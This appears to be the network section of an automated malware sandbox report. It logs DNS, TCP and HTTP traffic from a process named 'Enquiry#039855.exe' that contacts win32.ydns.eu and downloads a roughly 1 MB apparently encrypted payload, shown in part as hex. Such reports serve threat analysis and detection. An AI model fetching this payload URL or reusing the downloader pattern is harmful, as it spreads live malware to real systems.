Mar 1, 2025 14:42:23.778817892 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.778891087 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.778903008 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.778913975 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.778924942 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.778937101 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.778939009 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.778949022 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.778960943 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.778964043 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.778971910 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.778992891 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.779022932 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.779206991 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.779217958 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.779230118 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.779241085 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.779253006 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.779253960 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.779264927 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.779275894 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.779288054 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.779294968 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.779344082 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.779345036 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.779556036 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.779567957 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.779577971 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.779592037 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.779603958 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.779613972 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.779613972 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.779616117 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.779628038 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.779642105 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.779653072 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.779679060 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.779679060 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.779716969 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.779719114 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.779730082 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.779741049 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.779747009 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.779758930 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.779767036 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.779772997 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.779778957 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.779812098 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.779853106 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.780036926 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.780047894 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.780060053 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.780069113 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.780096054 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.780128956 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.815380096 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.815536976 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.815550089 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.815561056 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.815578938 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.815586090 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.815598965 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.815602064 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.815610886 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.815622091 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.815634966 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.815671921 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.815701008 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.815711975 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.815717936 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.815730095 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.815742016 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.815748930 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.815753937 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.815766096 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.815772057 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.815778017 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.815795898 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.815814972 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.815839052 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.815850973 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.815865040 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.815876007 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.815896034 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.815918922 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.815980911 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.815994024 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.816004992 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.816015005 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.816102982 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.816102982 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.816116095 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.816128016 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.816139936 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.816188097 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.816247940 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.816260099 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.816272020 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.816283941 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.816293001 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.816297054 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.816315889 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.816350937 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.816359043 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.816364050 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.816375017 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.816406965 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.816519976 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.816533089 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.816544056 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.816555977 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.816560030 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.816586971 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.816652060 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.816663980 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.816682100 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.816693068 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.816704035 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.816720963 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.816720963 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.816723108 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.816735029 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.816746950 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.816772938 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.869626999 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.869646072 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.869657993 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.869668961 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.869680882 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.869692087 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.869704962 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.869716883 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.869771957 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.869781971 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.869781971 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.869797945 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.869811058 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.869813919 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.869821072 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.869832039 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.869843006 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.869843006 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.869856119 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.869865894 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.869868040 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.869879007 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.869891882 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.869899035 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.869901896 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.869915009 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.869916916 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.869968891 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.869968891 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.870321989 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.870333910 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.870346069 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.870357037 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.870384932 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.870388031 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.870399952 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.870408058 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.870412111 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.870424032 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.870436907 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.870446920 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.870457888 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.870457888 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.870470047 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.870482922 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.870524883 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.870560884 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.870579958 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.870590925 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.870603085 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.870615005 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.870624065 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.870626926 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.870639086 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.870646000 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.870656967 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.870663881 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.870670080 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.870681047 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.870691061 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.870702982 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.870713949 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.870717049 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.870727062 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.870738983 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.870763063 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.870902061 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.870918989 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.870929956 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.870939970 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.870949984 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.870963097 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.870966911 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.870974064 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.870986938 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.870987892 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.871001959 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.871010065 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.871037960 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.871486902 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.871505022 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.871515989 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.871536016 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.871540070 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.871556997 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.871557951 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.871568918 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.871581078 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.871592045 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.871597052 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.871603012 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.871615887 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.871628046 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.871634960 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.871639013 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.871649981 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.871653080 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.871661901 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.871674061 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.871673107 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.871685982 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.871695995 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.871697903 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.871726036 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.871763945 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:27.763170004 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:27.763322115 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:56.726541042 CET	49704	80	192.168.2.8	45.144.214.104

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 1, 2025 14:42:21.986511946 CET	63386	53	192.168.2.8	1.1.1.1
Mar 1, 2025 14:42:22.002300024 CET	53	63386	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 1, 2025 14:42:21.986511946 CET	192.168.2.8	1.1.1.1	0x406a	Standard query (0)	win32.ydns.eu	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 1, 2025 14:42:22.002300024 CET	1.1.1.1	192.168.2.8	0x406a	No error (0)	win32.ydns.eu		45.144.214.104	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

win32.ydns.eu

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49704	45.144.214.104	80	5932	C:\Users\user\Desktop\Enquiry#039855.exe

Timestamp	Bytes transferred	Direction	Data
Mar 1, 2025 14:42:22.017040014 CET	107	OUT	GET /never/lookinto/it/panel/uploads/Tnemxaef.vdf HTTP/1.1 Host: win32.ydns.eu Connection: Keep-Alive
Mar 1, 2025 14:42:22.754475117 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 01 Mar 2025 13:42:22 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Sat, 01 Mar 2025 11:22:58 GMT ETag: "f9c08-62f46252a2ae0" Accept-Ranges: bytes Content-Length: 1022984 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Data Raw: e5 c4 35 8e 0f c6 ad 6c 46 10 20 36 76 c0 71 ce 4d 2c 4b 08 c1 c6 ac 89 5b 3b 24 70 9c 30 ba 81 db 28 5d f6 25 ed e0 71 9f 1b d0 bc 24 a1 d1 91 1a e3 44 0d aa 4d 70 10 a1 ae b1 c4 2d 0d 40 d1 08 d1 c9 2a 84 75 b6 9d c8 26 77 66 ff 3d b0 11 78 2c 2c df b3 63 88 99 36 29 53 3d 1b 73 43 98 39 6d 80 68 f6 66 2d f1 6d b5 d3 2b 35 2b 08 84 bd f9 69 de 5e f4 20 95 8f 14 a5 1e 53 ee a4 54 4f dc bb d4 59 9a 82 52 98 61 8a 9d 93 0f f7 49 ff b3 07 45 97 05 11 3d d1 26 e4 ee 0f b4 7f 95 de 7d d8 ca a4 09 46 32 01 5d cd 58 20 ac d0 5f 9a dd 1d a3 15 2d f9 48 f0 5f 70 c5 ef 39 d0 cc 0f dd c3 5d 78 02 9e b3 35 ae ec 19 32 7c f9 e2 23 bc 9f 7a 4f ba 32 0c 1d ee 91 0a 93 33 92 29 0a 82 93 56 e2 b5 01 2d 96 8f 88 ef 3a 4d e3 11 3e c2 31 cb 1a ac a1 01 fb b4 a3 80 7c 1e 5e 8c 77 e0 5b d9 8a f8 9a 2a 8f fd b0 ba a4 0e 64 50 ae 95 7c 02 76 f4 12 87 6e 00 07 ee 6d 2c e8 37 96 93 20 d9 91 75 f9 c0 ce ee ad f6 57 f8 fc 73 25 fb 90 b9 ec f9 dd 42 9f 54 f9 02 15 af 23 ae c1 a7 8e 4c e5 43 c0 4e 11 e6 98 c3 17 7a 1d 8a 3c 64 [TRUNCATED] Data Ascii: 5lF 6vqM,K[;$p0(]%q$DMp-@u&wf=x,,c6)S=sC9mhf-m+5+i^ STOYRaIE=&}F2]X _-H_p9]x52\|#zO23)V-:M>1\|^w[dP\|vnm,7 uWs%BT#LCNz<d~+%-"$3wehDMq'dpn$&dwB(]'qxi=J`4eJ w(6`9j%+tKz:}g!ZaTaSlh\Aqd(%+J'4Su8-3HQ5\|j~ij2t$y4Wb0qmMXQT;{zQz6[@'bS,BoR&YJ3C-Tt@^kJ2^_L9"f_.6yi:SjH\|C12%Re+kQOI8!Ex]3F+U^F04e^Zc@4[vaFm]997OC]WPXV_}ov+r67Fih{}2qG\P$&\|D,]xFkMX/a~rm3=6css*7
Mar 1, 2025 14:42:22.754492998 CET	1236	IN	Data Raw: b3 3b 4b a4 35 83 59 58 4e 6b fe 86 c6 dd 98 39 66 30 c0 89 c3 00 29 26 69 b5 f8 98 1e 53 ca 58 f2 25 9e 91 d0 95 84 47 e5 df 0e 4e f4 46 87 4b 5a df 51 a9 b3 dd 50 45 b3 8f dc f3 6e ce 5a bf 54 2a 56 8e cc f9 5f 01 ec ef cf 1b 7a 72 1c c2 e8 2c Data Ascii: ;K5YXNk9f0)&iSX%GNFKZQPEnZTV_zr,AUkq;jX(pOr=(~3%f=aw#!#(lCBC!Ez=2n(%sW\JL!W WL2x;im-q?X$PZi0)-j{ZVP"z4mO7z
Mar 1, 2025 14:42:22.754610062 CET	448	IN	Data Raw: f6 bd 71 91 a4 04 3f 5f c0 b6 37 19 35 1c ad 3f a9 c4 dc 64 08 e6 6f ba 6c 81 c7 01 e8 83 8f ed 6f 52 61 0f 41 33 2d 74 4a 4e e9 34 f1 9e e8 94 9d b4 b6 b6 01 2e 3f ff 28 14 32 3f c8 a6 09 41 c4 74 0c dd fd 52 52 82 c8 fc 4f 26 95 0f eb c9 b1 fa Data Ascii: q?_75?doloRaA3-tJN4.?(2?AtRRO&[`j[.I>e#'Cth^.`3T GE)s]E\|&&5v :\|,)Zi5RImx6!ee/MY!8kDskolLE7;'
Mar 1, 2025 14:42:22.754622936 CET	1236	IN	Data Raw: ea 1e fa 45 76 5a d2 81 a6 be e6 17 9e 23 79 a2 fc b1 95 97 3a 45 09 39 e2 67 8d 86 96 76 65 0d 36 64 bc c1 da 63 3c 5d 4e 80 f5 fe 4f b7 ec 03 4c d4 70 9f 3d ad 1e 80 66 ed 4d 56 fa 11 d4 65 a2 67 1e fa 4c 20 11 89 d5 e3 f9 99 a6 53 57 3c 47 d5 Data Ascii: EvZ#y:E9gve6dc<]NOLp=fMVegL SW<GR)n\<Tn<CNki<)c!K&*+(E4 "6@I(Pm0#vrPe@XSV5v78(6>h(TIl-UP
Mar 1, 2025 14:42:22.754635096 CET	1236	IN	Data Raw: 3b 93 74 79 3f 20 64 a5 51 fd 82 5d a5 0e 88 c7 3f fc f8 8e 41 6b 77 1d ae ca af 25 b2 e6 e7 fb ca 7b 00 7c 53 74 ba 3d 38 9f 24 71 29 f3 4c a8 a9 1e 69 a8 34 5e b2 da 61 4a a6 e2 0b 95 34 b7 7f f0 ac b5 7e ac ef 23 dc 59 bd 69 96 ee 41 1f 6c 1a Data Ascii: ;ty? dQ]?Akw%{\|St=8$q)Li4^aJ4~#YiAlv4nrg3J\lvp4'={cQw^d)oBLlFg0];LfyH!(I_+0@]z'^>U!^N].pB]%
Mar 1, 2025 14:42:22.754647017 CET	1236	IN	Data Raw: 66 f6 04 c8 7f 8c 16 30 28 80 84 3f f7 55 a7 00 98 78 40 b8 f3 f6 80 c5 2b 6b 8d 26 8e 6b e7 2a ac ca 76 da 73 47 87 95 ac b6 b9 ce fd a4 ce f9 f4 2f dd 20 0f 2c d4 c2 fd a6 81 4b b3 14 30 a9 2b cd 72 8a 7a 69 08 8e a4 4d 26 4e bd bd a6 e9 eb 16 Data Ascii: f0(?Ux@+k&kvsG/ ,K0+rziM&NL^zX/R-wEv"?GZ6?Z8wFWt!=%1# S/Mc<`B.sSx=<niB1 JM>7.tPj
Mar 1, 2025 14:42:22.754779100 CET	1236	IN	Data Raw: 63 a5 8f 1b 3c 63 30 04 23 f8 21 9d 17 89 a1 bc 76 a6 c7 6d 7d ef 9b 80 17 2f 7f 02 b9 6e f9 26 66 55 db 96 88 60 00 bf 66 bf 41 fb d2 e9 9e 1e c8 a6 1e ad 45 5a bb 23 f1 f0 ce 68 f3 ab 1f ba 34 aa 2b 10 0c 45 f1 cf 30 03 14 ff 5b 49 92 f4 b6 35 Data Ascii: c<c0#!vm}/n&fU`fAEZ#h4+E0[I5Q31)T]-_SblR,W[`PUe6VSv$rx+([8S\K_LpKVOTf4#bL`TbZL!xCx7"qye
Mar 1, 2025 14:42:22.754791975 CET	1236	IN	Data Raw: eb 92 99 10 8e 44 cd ab 36 72 d6 55 27 40 be be 69 c7 7d 4d 5f 6e bc 18 f3 d7 68 3a 1b 14 00 a2 df 6e 3a 1d 49 66 64 bb 67 99 e6 82 66 8c 1e 41 40 f2 c1 94 4f 32 bd ad b9 ab 88 7d 09 cd 61 d0 1d 0a 6c eb 7a db c3 01 f4 07 83 56 b2 46 97 a7 38 9a Data Ascii: D6rU'@i}M_nh:n:IfdgfA@O2}alzVF8kRQFPFq?CV Hs6VNR\er}Ok%rz_2KXf]\Lgd%+Zup^3;(8071<n3ZR
Mar 1, 2025 14:42:22.754803896 CET	1236	IN	Data Raw: 62 b5 3a fc cf 5b 6c 9b 17 73 7e 84 53 67 a6 c3 df 2c 7f d2 32 f8 3b 33 b8 3d f9 8c bb df da 3b 33 72 2e 37 f5 40 0a 67 13 b0 02 08 19 f1 c2 c8 f5 d9 f2 48 d6 1f af e1 f9 1b 99 e5 2c 07 1b 61 13 49 0f be be e1 79 94 0c 98 2f ee 05 d0 34 b9 4d 3c Data Ascii: b:[ls~Sg,2;3=;3r.7@gH,aIy/4M<i0B72Lp`Q'2}rhz"w3N,d)vV[df=Td~8i@NIWCDw>'6k*Q-m@4t 3}h'IUI]CngWA~:X80
